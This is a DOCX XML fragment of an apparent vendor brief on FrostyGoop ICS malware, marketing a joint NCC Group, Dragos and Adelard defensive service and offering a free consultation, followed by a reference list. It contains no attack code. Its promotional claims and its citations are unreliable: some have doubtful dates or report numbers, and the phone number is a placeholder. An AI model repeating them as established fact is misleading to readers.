      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ojxeiktsw9rf" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000268">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jqhglsbo2qoh" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated Response Capability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000269">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The combination of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard AESOP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides unique capabilities for addressing FrostyGoop and similar ICS malware threats </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref84">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[84]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mirwexky92i3" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modbus Security Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Comprehensive protocol security evaluation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref85">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[85]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Architecture Review</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: IT/OT boundary validation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref86">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[86]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ICS-specific forensics and recovery </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref87">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26E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x1hvklske0ai" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Purpose-built analytics for Modbus manipulation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270">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset Inventory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Complete Modbus device discovery and monitoring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271">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Hunting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Proactive searches for ICS malware indicators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272">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3pys2kv8laz0" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety-Security Integration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000273">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HAZOP Integration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Safety impact assessment of cyber scenarios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274">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIL Verification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensuring safety functions remain protected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275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Barrier Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Combined cyber-physical protection strategies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276">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h32nkjkwj14y" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Competitive Advantage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000277">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike traditional IT security vendors, the tri-partner solution offers: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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Direct FrostyGoop detection capabilities developed by Dragos researchers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27A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ICS protocol expertise including Modbus security hardening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27B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety-security convergence critical for process control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hc6ic79k24lr" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expert Consultation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4lccpcmmc61a" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">15-Minute Assessment Opportunity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000280">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Given FrostyGoop's demonstrated ability to manipulate critical infrastructure, we offer a complimentary 15-minute consultation to assess your organization's exposure to ICS-specific malware threats.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Assessment Focus Areas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modbus protocol exposure assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000285">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet-facing ICS device inventory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000286">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency manual operation readiness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000287">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety system cyber resilience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Immediate Value Delivered</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identification of exposed Modbus devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Priority remediation recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop-specific detection guidance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency response planning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Contact our ICS security team at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">otce-response@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1-800-XXX-XXXX</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qh6xsynwjrs5" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000294">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop represents a fundamental shift in cyber warfare, demonstrating that adversaries can now weaponize the very infrastructure meant to sustain life—heating, water, and food systems. The successful attack on Lviv's district heating system during winter proved that ICS malware can directly harm civilian populations, making the protection of operational technology a moral imperative for our generation.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tri-partner solution of NCC Group OTCE, Dragos, and Adelard offers the only comprehensive defense against this new class of threats, combining protocol-specific detection, safety-security integration, and proven incident response capabilities. As we work to ensure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defending against ICS-specific malware like FrostyGoop becomes essential to preserving the infrastructure they will inherit.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sv7tq0k4mbqi" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References &amp; Citations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hqsq9jewobqt" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Intelligence Sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Dragos Inc., "FrostyGoop ICS Malware Intelligence Brief," Dragos WorldView Platform, July 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hub.dragos.com/hubfs/Reports/Dragos-FrostyGoop-ICS-Malware-Intel-Brief-0724_.pdf</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[2] Security Service of Ukraine (SBU), "Cyber Attack on Lviv District Heating," CSSC Report UKCS-2024-0122, January 24, 2024.</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[3] Dragos Inc., "The Evolution of ICS Malware: From Stuxnet to FrostyGoop," Industrial Cybersecurity Report, April 2024.</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[4] CISA, "Alert AA24-179A: Mitigating Cyber Threats to Operational Technology," Cybersecurity and Infrastructure Security Agency, June 28, 2024.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[5] Dragos Inc., "FrostyGoop Technical Analysis," Malware Analysis Report MAR-2024-04, April 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_htpj75ywlrb5" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[28] Mikrotik, "RouterOS Security Advisory: Default Credentials," Security Notice MTK-2023-11, November 2023.</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[29] CISA, "ICS Advisory ICSA-24-025-01: Mikrotik RouterOS Vulnerabilities," January 25, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_89b4czni4bh" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[35] Lvivteploenergo, "Post-Incident Analysis: January 2024 Heating Disruption," Internal Report (translated), February 2024.</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[36] Ekonomichna Pravda, "Heating Outage Affects 100,000 in Lviv," Ukrainian News Report, January 23, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.epravda.com.ua/news/2024/01/23/709063/</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[55] Ukraine Cyber Security Situation Center, "Technical Report: FrostyGoop Attack on Critical Infrastructure," CSSC-TR-2024-001, February 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g3ch4sh4hsfk" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[54] MITRE ATT&amp;CK, "T1133: External Remote Services," Enterprise Matrix v14.1, October 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org/techniques/T1133/</w:t>
        </w:r>
